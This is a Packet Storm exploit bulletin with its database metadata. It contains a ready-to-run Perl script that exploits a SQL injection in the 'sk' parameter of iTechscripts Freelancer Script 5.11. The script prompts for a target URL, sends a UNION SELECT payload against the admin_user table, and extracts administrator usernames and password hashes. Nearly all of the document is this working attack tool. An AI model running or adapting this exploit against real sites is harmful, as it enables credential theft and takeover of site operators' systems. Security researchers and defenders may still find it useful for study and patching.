ID PACKETSTORM:140483
Type packetstorm
Reporter v3n0m
Modified 2017-01-13T00:00:00
Description
`#!/usr/bin/perl -w
# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability
# Author : v3n0m
# Contact : v3n0m[at]outlook[dot]com
# Date : January, 11-2017 GMT +7:00 Jakarta, Indonesia
# Software : Freelancer Script
# Version : 5.11 Lower versions may also be affected
# Price : US$199.00
# Link : http://itechscripts.com/freelancer-script/
# Greetz : YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !!
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}
clear();
print "|----------------------------------------------------|\n";
print "| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\n";
print "| Coded by : v3n0m |\n";
print "| Greetz : YOGYACARDERLINK |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:[http://wwww.target.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
$concat="group_concat(username,char(58),password)";
$table="admin_user";
$dheakarima = LWP::UserAgent->new() or die "Could not initalize browser\n";
$dheakarima->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "category.php?sk=-9999+union+all+select+null,null,".$concat.",null+from/**/".$table."+--+";
$xf2r = $dheakarima->request(HTTP::Request->new(GET=>$host));
$answer = $xf2r->content;
if ($answer =~/([0-9a-fA-F]{32})/) {
print "\n[+] Admin Password : $1\n";
print "[+] Success !! Check target for details...\n";
print "\n";
}
else{print "\n[-] Failed\n";
}
`
{"id": "PACKETSTORM:140483", "type": "packetstorm", "bulletinFamily": "exploit", "title": "iTechscripts Freelancer Script 5.11 SQL Injection", "description": "", "published": "2017-01-13T00:00:00", "modified": "2017-01-13T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/140483/iTechscripts-Freelancer-Script-5.11-SQL-Injection.html", "reporter": "v3n0m", "references": [], "cvelist": [], "lastseen": "2017-01-13T23:04:59", "viewCount": 15, "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "sourceHref": "https://packetstormsecurity.com/files/download/140483/freelancerscript511-sql.txt", "sourceData": "`#!/usr/bin/perl -w \n \n# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability \n# Author : v3n0m \n# Contact : v3n0m[at]outlook[dot]com \n# Date : January, 11-2017 GMT +7:00 Jakarta, Indonesia \n# Software : Freelancer Script \n# Version : 5.11 Lower versions may also be affected \n# Price : US$199.00 \n# Link : http://itechscripts.com/freelancer-script/ \n# Greetz : YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !! \nsub clear{ \nsystem(($^O eq 'MSWin32') ? 'cls' : 'clear'); \n} \nclear(); \nprint \"|----------------------------------------------------|\\n\"; \nprint \"| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\\n\"; \nprint \"| Coded by : v3n0m |\\n\"; \nprint \"| Greetz : YOGYACARDERLINK |\\n\"; \nprint \"|----------------------------------------------------|\\n\"; \nuse LWP::UserAgent; \nprint \"\\nInsert Target:[http://wwww.target.com/path/]: \"; \nchomp(my $target=<STDIN>); \nprint \"\\n[!] Exploiting Progress...\\n\"; \nprint \"\\n\"; \n$concat=\"group_concat(username,char(58),password)\"; \n$table=\"admin_user\"; \n$dheakarima = LWP::UserAgent->new() or die \"Could not initalize browser\\n\"; \n$dheakarima->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); \n$host = $target . \"category.php?sk=-9999+union+all+select+null,null,\".$concat.\",null+from/**/\".$table.\"+--+\"; \n$xf2r = $dheakarima->request(HTTP::Request->new(GET=>$host)); \n$answer = $xf2r->content; \nif ($answer =~/([0-9a-fA-F]{32})/) { \nprint \"\\n[+] Admin Password : $1\\n\"; \nprint \"[+] Success !! Check target for details...\\n\"; \nprint \"\\n\"; \n} \nelse{print \"\\n[-] Failed\\n\"; \n} \n \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645521528}}
{}